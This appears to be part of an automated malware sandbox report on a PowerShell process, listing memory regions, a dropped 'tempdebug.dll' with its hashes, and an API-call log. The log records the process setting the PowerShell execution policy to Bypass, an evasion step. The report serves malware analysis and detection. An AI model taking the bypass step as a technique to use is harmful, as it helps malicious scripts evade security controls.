private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
powershell.exe.mui	0x000e0000	0x000e2fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000150000	0x00150000	0x0015ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000160000	0x00160000	0x00160fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000170000	0x00170000	0x00170fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000180000	0x00180000	0x00181fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000190000	0x00190000	0x001cffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000001d0000	0x001d0000	0x001d0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000001e0000	0x001e0000	0x001e1fff	Pagefile Backed Memory	Readable	Region Actions
cversions.2.db	0x001f0000	0x001f3fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000200000	0x00200000	0x00200fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000210000	0x00210000	0x0021ffff	Private Memory	Readable, Writable	Region Actions Download Dump
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db	0x00220000	0x00245fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000250000	0x00250000	0x0034ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000350000	0x00350000	0x00417fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000420000	0x00420000	0x00520fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000530000	0x00530000	0x0112ffff	Pagefile Backed Memory	Readable	Region Actions
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db	0x01130000	0x0115ffff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x01160000	0x01163fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001170000	0x01170000	0x01170fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001180000	0x01180000	0x01180fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000001190000	0x01190000	0x01190fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000011a0000	0x011a0000	0x011affff	Private Memory		Region Actions Download Dump
private_0x00000000011b0000	0x011b0000	0x011bffff	Private Memory		Region Actions Download Dump
private_0x00000000011c0000	0x011c0000	0x011fffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001200000	0x01200000	0x012defff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x012e0000	0x015aefff	Memory Mapped File	Readable	Region Actions
private_0x00000000015b0000	0x015b0000	0x015bffff	Private Memory		Region Actions Download Dump
private_0x00000000015c0000	0x015c0000	0x015cffff	Private Memory		Region Actions Download Dump
private_0x00000000015d0000	0x015d0000	0x0160ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001610000	0x01610000	0x0161ffff	Private Memory		Region Actions Download Dump
private_0x0000000001620000	0x01620000	0x0162ffff	Private Memory		Region Actions Download Dump
private_0x0000000001630000	0x01630000	0x0166ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000001670000	0x01670000	0x016affff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000016b0000	0x016b0000	0x01aa2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001ab0000	0x01ab0000	0x01baffff	Private Memory	Readable, Writable	Region Actions Download Dump
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x01bb0000	0x01c15fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001c20000	0x01c20000	0x01c2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
l_intl.nls	0x01c30000	0x01c32fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001c40000	0x01c40000	0x01c40fff	Private Memory	Readable, Writable	Region Actions Download Dump
sorttbls.nlp	0x01c50000	0x01c54fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001c60000	0x01c60000	0x01c6ffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortkey.nlp	0x01c70000	0x01cb0fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001cc0000	0x01cc0000	0x01cfffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001d00000	0x01d00000	0x01d9ffff	Private Memory	Readable, Writable	Region Actions Download Dump
microsoft.wsman.runtime.dll	0x01da0000	0x01da7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000001db0000	0x01db0000	0x01deffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001df0000	0x01df0000	0x03deffff	Private Memory	Readable, Writable	Region Actions
kernelbase.dll.mui	0x03df0000	0x03eaffff	Memory Mapped File	Readable, Writable	Region Actions
system.transactions.dll	0x03eb0000	0x03ef2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000003f00000	0x03f00000	0x03f00fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000003f10000	0x03f10000	0x03f10fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000003f10000	0x03f10000	0x03f1ffff	Private Memory		Region Actions Download Dump
pagefile_0x0000000003f20000	0x03f20000	0x03f30fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000003f40000	0x03f40000	0x03f7ffff	Private Memory	Readable, Writable	Region Actions Download Dump
system.management.automation.dll	0x03f80000	0x04261fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorrc.dll	0x04270000	0x042c3fff	Memory Mapped File	Readable	Region Actions
private_0x00000000042d0000	0x042d0000	0x042dffff	Private Memory		Region Actions Download Dump
private_0x00000000042e0000	0x042e0000	0x042effff	Private Memory		Region Actions Download Dump
private_0x00000000042f0000	0x042f0000	0x042fffff	Private Memory		Region Actions Download Dump
private_0x0000000004300000	0x04300000	0x0430ffff	Private Memory		Region Actions Download Dump
private_0x0000000004310000	0x04310000	0x0431ffff	Private Memory		Region Actions Download Dump
private_0x0000000004320000	0x04320000	0x0432ffff	Private Memory		Region Actions Download Dump
private_0x0000000004330000	0x04330000	0x0433ffff	Private Memory		Region Actions Download Dump
private_0x0000000004340000	0x04340000	0x0434ffff	Private Memory		Region Actions Download Dump
powershell.exe	0x22250000	0x222c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
culture.dll	0x60340000	0x60347fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.directoryservices.ni.dll	0x60d80000	0x60e93fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.ni.dll	0x60ea0000	0x60fa3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.xml.ni.dll	0x60fb0000	0x614e5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.management.ni.dll	0x614f0000	0x615b2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.utility.ni.dll	0x615c0000	0x6175dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.core.ni.dll	0x61760000	0x61994fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.ni.dll	0x619a0000	0x62219fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.ni.dll	0x62220000	0x629bbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorlib.ni.dll	0x629c0000	0x634b7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorwks.dll	0x634c0000	0x63a6afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x63cf0000	0x63d69fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.dll	0x67aa0000	0x67ae2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x6bb30000	0x6bb79fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.security.ni.dll	0x6d010000	0x6d03cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.ni.dll	0x6d100000	0x6d19bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.wsman.management.ni.dll	0x6d1a0000	0x6d224fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.dll	0x6d230000	0x6d511fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.diagnostics.ni.dll	0x6edc0000	0x6ee0afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
linkinfo.dll	0x6f110000	0x6f118fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shdocvw.dll	0x6f120000	0x6f14dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntshrui.dll	0x70100000	0x7016ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cscapi.dll	0x70170000	0x7017afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x71510000	0x7155bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.configuration.install.ni.dll	0x71fe0000	0x72004fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shfolder.dll	0x72020000	0x72024fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.consolehost.ni.dll	0x72040000	0x720c0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr80.dll	0x720d0000	0x7216afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x739d0000	0x73a0ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
slc.dll	0x74190000	0x74199fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x741c0000	0x741d3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x742b0000	0x7444dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x74600000	0x746f4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x74800000	0x74820fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x74940000	0x74948fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x74af0000	0x74b06fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74c20000	0x74c5afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74e70000	0x74e85fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x75290000	0x752a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75340000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x753f0000	0x753fafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x754c0000	0x754e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
devobj.dll	0x756d0000	0x756e1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x756f0000	0x75708fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75710000	0x757b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x758a0000	0x764e9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x764f0000	0x7658ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x766f0000	0x76772fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x769a0000	0x76b3cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76b40000	0x76b96fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76ba0000	0x76c2efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x77140000	0x7729bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x773f0000	0x773f4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x77420000	0x77464fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump
For performance reasons, the remaining 54 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\bgc6u8oy yxgxkr\appdata\local\tempdebug.dll	519.00 KB (531456 bytes)	MD5: 64b2ac701a0d67da134e13b2efc46900 SHA1: 1bb516d70591a5a0eb55ee71f9f38597f3640b14 SHA256: f3f55c3df39b85d934121355bed439b53501f996e9b39d4abed14c7fe8081d92		File Actions Show Properties Download

Threads

Thread 0xa54

(Host: 349, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
